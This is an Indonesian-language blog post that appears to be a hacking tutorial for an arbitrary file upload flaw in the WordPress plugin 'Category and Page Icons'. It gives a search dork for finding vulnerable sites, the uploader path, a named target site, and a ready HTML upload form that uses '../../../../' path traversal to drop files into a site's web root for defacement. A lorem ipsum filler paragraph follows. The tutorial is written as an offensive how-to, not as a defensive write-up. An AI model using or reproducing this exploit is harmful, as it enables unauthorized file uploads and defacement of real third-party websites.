Pages

WordPress Plugin 'Category and Page Icons' Arbitary Upload Vuln

Nah Holla  
Kali ini Saya Akan Membahas Tentang Exploit Wp Plugins  'Category and Page Icons' Yang Sedang Hangat / HOT Saat ini  

Oke2 Langsung saja mblo 

Dork :  inurl:/wp-content/plugins/category-page-icons/

Lalu Exploit-nya : /wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

Nah Saya Sudah Siapkan Target-nya yaitu ~

http://www.themasb.org/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

Nah Sekarang Script Arbitary Upload nya :

<html>
<form action="www.LeoVariZa.co.id/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="POST" enctype="multipart/form-data">
Choose File to upload : <input type="file" name="wpdev-async-upload"><br />
Directory : <input type="text" name="dir_icons" value="../../../../"><br />
<input type="submit" value="Upload">
</form>
</html>


*Yang Berwarna Biru Ganti Dengan Target Kamu 

Copy Script diatas ke Notepad, Save as .HTmL  

Lalu Buka File Arbitarynya Lewat Browser Kamu - Jadinya Seperti ini ~

[Image: Leovarisa.png]

Lalu Pilih File Kamu yang Formatnya .html .txt .png .swf .jpg etc :jos: :morning:

Ingat Ga Support .php loh  :troll:

Kalau Sudah Klik Upload 

Lalu akan Muncul Seperti ini Artinya Sudah Berhasil :))

[Image: Untitled_1zzzz.png]


Lalu Tinggal Di Panggil deh Filenya Formatnya http://www.LeoVariZa.co.id/leovarisa.htm

Jadinya Seperti ini : www.themasb.org/leovarisa.htm

Oke Segitu Dulu Yah :)))
Mau Ngerjain TUgas Dari Dosen Dulu Nih Banyak BeudZzzz  x_x   >_<  :ngakak:   :joget2:    :cool:

Unknown

Phasellus facilisis convallis metus, ut imperdiet augue auctor nec. Duis at velit id augue lobortis porta. Sed varius, enim accumsan aliquam tincidunt, tortor urna vulputate quam, eget finibus urna est in augue.

1 komentar: